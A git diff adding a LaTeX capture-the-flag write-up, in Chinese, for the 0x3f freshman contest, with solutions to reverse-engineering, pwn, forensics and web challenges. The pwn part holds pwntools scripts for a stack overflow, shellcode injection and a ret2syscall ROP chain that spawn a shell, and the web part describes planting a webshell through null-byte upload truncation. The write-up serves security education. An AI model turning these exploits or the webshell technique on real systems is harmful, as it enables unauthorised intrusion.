diff --git a/0x3f-writeup/20190331/cugctf-writeup.tex b/0x3f-writeup/20190331/cugctf-writeup.tex new file mode 100644 index 0000000..38e7426 --- /dev/null +++ b/0x3f-writeup/20190331/cugctf-writeup.tex @@ -0,0 +1,216 @@ +% Options for packages loaded elsewhere +\PassOptionsToPackage{unicode=true}{hyperref} +\PassOptionsToPackage{hyphens}{url} +% +\documentclass[ +]{ctexart} +\usepackage{lmodern} +\usepackage{amssymb,amsmath} +\usepackage{ifxetex,ifluatex} +\ifnum 0\ifxetex 1\fi\ifluatex 1\fi=0 % if pdftex + \usepackage[T1]{fontenc} + \usepackage[utf8]{inputenc} + \usepackage{textcomp} % provides euro and other symbols +\else % if luatex or xelatex + \usepackage{unicode-math} + \defaultfontfeatures{Scale=MatchLowercase} + \defaultfontfeatures[\rmfamily]{Ligatures=TeX,Scale=1} +\fi +% Use upquote if available, for straight quotes in verbatim environments +\IfFileExists{upquote.sty}{\usepackage{upquote}}{} +\IfFileExists{microtype.sty}{% use microtype if available + \usepackage[]{microtype} + \UseMicrotypeSet[protrusion]{basicmath} % disable protrusion for tt fonts +}{} +\makeatletter +\@ifundefined{KOMAClassName}{% if non-KOMA class + \IfFileExists{parskip.sty}{% + \usepackage{parskip} + }{% else + \setlength{\parindent}{0pt} + \setlength{\parskip}{6pt plus 2pt minus 1pt}} +}{% if KOMA class + \KOMAoptions{parskip=half}} +\makeatother +\usepackage{xcolor} +\IfFileExists{xurl.sty}{\usepackage{xurl}}{} % add URL line breaks if available +\IfFileExists{bookmark.sty}{\usepackage{bookmark}}{\usepackage{hyperref}} +\hypersetup{ + pdftitle={0x3f 新生赛 writeup}, + pdfauthor={TooYoungTooSimp}, + hidelinks, +} +\urlstyle{same} % disable monospaced font for URLs +\usepackage{color} +\usepackage{fancyvrb} +\newcommand{\VerbBar}{|} +\newcommand{\VERB}{\Verb[commandchars=\\\{\}]} +\DefineVerbatimEnvironment{Highlighting}{Verbatim}{commandchars=\\\{\}} +% Add ',fontsize=\small' for more characters per line +\newenvironment{Shaded}{}{} +\newcommand{\AlertTok}[1]{\textcolor[rgb]{1.00,0.00,0.00}{\textbf{#1}}} +\newcommand{\AnnotationTok}[1]{\textcolor[rgb]{0.38,0.63,0.69}{\textbf{\textit{#1}}}} +\newcommand{\AttributeTok}[1]{\textcolor[rgb]{0.49,0.56,0.16}{#1}} +\newcommand{\BaseNTok}[1]{\textcolor[rgb]{0.25,0.63,0.44}{#1}} +\newcommand{\BuiltInTok}[1]{#1} +\newcommand{\CharTok}[1]{\textcolor[rgb]{0.25,0.44,0.63}{#1}} +\newcommand{\CommentTok}[1]{\textcolor[rgb]{0.38,0.63,0.69}{\textit{#1}}} +\newcommand{\CommentVarTok}[1]{\textcolor[rgb]{0.38,0.63,0.69}{\textbf{\textit{#1}}}} +\newcommand{\ConstantTok}[1]{\textcolor[rgb]{0.53,0.00,0.00}{#1}} +\newcommand{\ControlFlowTok}[1]{\textcolor[rgb]{0.00,0.44,0.13}{\textbf{#1}}} +\newcommand{\DataTypeTok}[1]{\textcolor[rgb]{0.56,0.13,0.00}{#1}} +\newcommand{\DecValTok}[1]{\textcolor[rgb]{0.25,0.63,0.44}{#1}} +\newcommand{\DocumentationTok}[1]{\textcolor[rgb]{0.73,0.13,0.13}{\textit{#1}}} +\newcommand{\ErrorTok}[1]{\textcolor[rgb]{1.00,0.00,0.00}{\textbf{#1}}} +\newcommand{\ExtensionTok}[1]{#1} +\newcommand{\FloatTok}[1]{\textcolor[rgb]{0.25,0.63,0.44}{#1}} +\newcommand{\FunctionTok}[1]{\textcolor[rgb]{0.02,0.16,0.49}{#1}} +\newcommand{\ImportTok}[1]{#1} +\newcommand{\InformationTok}[1]{\textcolor[rgb]{0.38,0.63,0.69}{\textbf{\textit{#1}}}} +\newcommand{\KeywordTok}[1]{\textcolor[rgb]{0.00,0.44,0.13}{\textbf{#1}}} +\newcommand{\NormalTok}[1]{#1} +\newcommand{\OperatorTok}[1]{\textcolor[rgb]{0.40,0.40,0.40}{#1}} +\newcommand{\OtherTok}[1]{\textcolor[rgb]{0.00,0.44,0.13}{#1}} +\newcommand{\PreprocessorTok}[1]{\textcolor[rgb]{0.74,0.48,0.00}{#1}} +\newcommand{\RegionMarkerTok}[1]{#1} +\newcommand{\SpecialCharTok}[1]{\textcolor[rgb]{0.25,0.44,0.63}{#1}} +\newcommand{\SpecialStringTok}[1]{\textcolor[rgb]{0.73,0.40,0.53}{#1}} +\newcommand{\StringTok}[1]{\textcolor[rgb]{0.25,0.44,0.63}{#1}} +\newcommand{\VariableTok}[1]{\textcolor[rgb]{0.10,0.09,0.49}{#1}} +\newcommand{\VerbatimStringTok}[1]{\textcolor[rgb]{0.25,0.44,0.63}{#1}} +\newcommand{\WarningTok}[1]{\textcolor[rgb]{0.38,0.63,0.69}{\textbf{\textit{#1}}}} +\setlength{\emergencystretch}{3em} % prevent overfull lines +\providecommand{\tightlist}{% + \setlength{\itemsep}{0pt}\setlength{\parskip}{0pt}} +\setcounter{secnumdepth}{-\maxdimen} % remove section numbering +% Redefines (sub)paragraphs to behave more like sections +\ifx\paragraph\undefined\else + \let\oldparagraph\paragraph + \renewcommand{\paragraph}[1]{\oldparagraph{#1}\mbox{}} +\fi +\ifx\subparagraph\undefined\else + \let\oldsubparagraph\subparagraph + \renewcommand{\subparagraph}[1]{\oldsubparagraph{#1}\mbox{}} +\fi + +% Set default figure placement to htbp +\makeatletter +\def\fps@figure{htbp} +\makeatother + + +\title{0x3f 新生赛 writeup} +\author{TooYoungTooSimp} +\date{2019/03/31} + +\begin{document} +\maketitle + +{ +\setcounter{tocdepth}{3} +\tableofcontents +} +\hypertarget{x3fux65b0ux751fux8d5b-writeup}{% +\section{0x3f新生赛 Writeup}\label{x3fux65b0ux751fux8d5b-writeup}} + +\hypertarget{re}{% +\subsection{Re}\label{re}} + +\hypertarget{r}{% +\subsubsection{R}\label{r}} + +下载可执行文件,用IDA打开,在main函数的最后发现一些mov,将立即数用字符显示即得flag。 + +\hypertarget{pwn}{% +\subsection{Pwn}\label{pwn}} + +\hypertarget{pwn1}{% +\subsubsection{pwn1}\label{pwn1}} + +简单的栈溢出 + +\begin{Shaded} +\begin{Highlighting}[] +\ImportTok{from}\NormalTok{ pwn }\ImportTok{import} \OperatorTok{*} +\NormalTok{pld}\OperatorTok{=}\StringTok{'a'}\OperatorTok{*}\BaseNTok{0x20}\OperatorTok{+}\StringTok{'b'}\OperatorTok{*}\DecValTok{8}\OperatorTok{+}\NormalTok{p64(}\BaseNTok{0x401182}\NormalTok{)} +\NormalTok{sh}\OperatorTok{=}\NormalTok{process(}\StringTok{'./01'}\NormalTok{)} +\NormalTok{sh.sendline(pld)} +\NormalTok{sh.interactive()} +\end{Highlighting} +\end{Shaded} + +\hypertarget{pwn2}{% +\subsubsection{pwn2}\label{pwn2}} + +通过提示可以找到C++的全局变量初始化函数,发现有mmap一块RWX的内存,而立即数反汇编后是\texttt{jmp\ rsp},栈又可执行,所以题解如下: + +\begin{Shaded} +\begin{Highlighting}[] +\ImportTok{from}\NormalTok{ pwn }\ImportTok{import} \OperatorTok{*} +\NormalTok{context.arch }\OperatorTok{=} \StringTok{'amd64'} +\NormalTok{sh }\OperatorTok{=}\NormalTok{ process(}\StringTok{'./02'}\NormalTok{)} +\NormalTok{pld }\OperatorTok{=} \StringTok{'a'} \OperatorTok{*} \BaseNTok{0x40} \OperatorTok{+} \StringTok{'b'} \OperatorTok{*} \DecValTok{8} \OperatorTok{+}\NormalTok{ p64(}\BaseNTok{0x666666660000}\NormalTok{) }\OperatorTok{+}\NormalTok{ asm(shellcraft.sh())} +\NormalTok{sh.sendline(pld)} +\NormalTok{sh.interactive()} +\end{Highlighting} +\end{Shaded} + +\hypertarget{pwn3}{% +\subsubsection{pwn3}\label{pwn3}} + +没有pie,静态链接,显然是ret2syscall。用ROPgadget找到那些地址直接用就行了。注意当目标地址中含有\texttt{\textbackslash{}x0a}的时候会导致输入截断,因为\texttt{\textquotesingle{}\textbackslash{}n\textquotesingle{}\ ==\ \textquotesingle{}\textbackslash{}x0a\textquotesingle{}}。 + +\begin{Shaded} +\begin{Highlighting}[] +\ImportTok{from}\NormalTok{ pwn }\ImportTok{import} \OperatorTok{*} +\NormalTok{adb}\OperatorTok{=}\BaseNTok{0x080570c4} +\NormalTok{cbx}\OperatorTok{=}\BaseNTok{0x0806f1b2} +\NormalTok{bsh}\OperatorTok{=}\BaseNTok{0x080dc068} +\NormalTok{i80}\OperatorTok{=}\BaseNTok{0x0804a31a} +\NormalTok{sh}\OperatorTok{=}\NormalTok{process(}\StringTok{'./03'}\NormalTok{)} +\NormalTok{pld}\OperatorTok{=}\NormalTok{flat([}\StringTok{'a'}\OperatorTok{*}\BaseNTok{0x30}\NormalTok{,}\StringTok{'b'}\OperatorTok{*}\DecValTok{4}\NormalTok{,adb,}\BaseNTok{0xb}\NormalTok{,}\DecValTok{0}\NormalTok{,bsh,cbx,}\DecValTok{0}\NormalTok{,bsh,i80])} +\NormalTok{sh.sendline(pld)} +\NormalTok{sh.interactive()} +\end{Highlighting} +\end{Shaded} + +\hypertarget{misc}{% +\subsection{Misc}\label{misc}} + +\hypertarget{cap}{% +\subsubsection{cap}\label{cap}} + +用提示给的网站修复cap,获得修复后的pcap包,跟踪TCP流,发现有两个位置上是lf和ga,将后面一系列包的这两位连起来就是flag了。 + +\hypertarget{picture}{% +\subsubsection{picture}\label{picture}} + +下载文件,解压后获得图片,用stegsolve打开,发现绿色通道最低位仿佛有信息,导出出来,根据提升修复bmp +header,打开即见flag。 + +\hypertarget{ux7b7eux5230}{% +\subsubsection{签到}\label{ux7b7eux5230}} + +复制粘贴,没啥好说的。 + +\hypertarget{web}{% +\subsection{Web}\label{web}} + +\hypertarget{upload}{% +\subsubsection{upload}\label{upload}} + +任意上传,用burpsuite拦截上传请求,使用0x00进行截断,用这种方法上传一句话木马,然后用中国菜刀类的工具浏览服务器目录,很容易就能发现flag + +\hypertarget{section}{% +\subsubsection{404}\label{section}} + +打开开发者工具,发现虽然看起来是404,实际上是200,flag就在http +headers里面。 + +\hypertarget{ios88}{% +\subsubsection{ios88}\label{ios88}} + +将user-agent改成ios的,然后把版本号都改成88,就能在http +headers里找到flag了。 + +\end{document}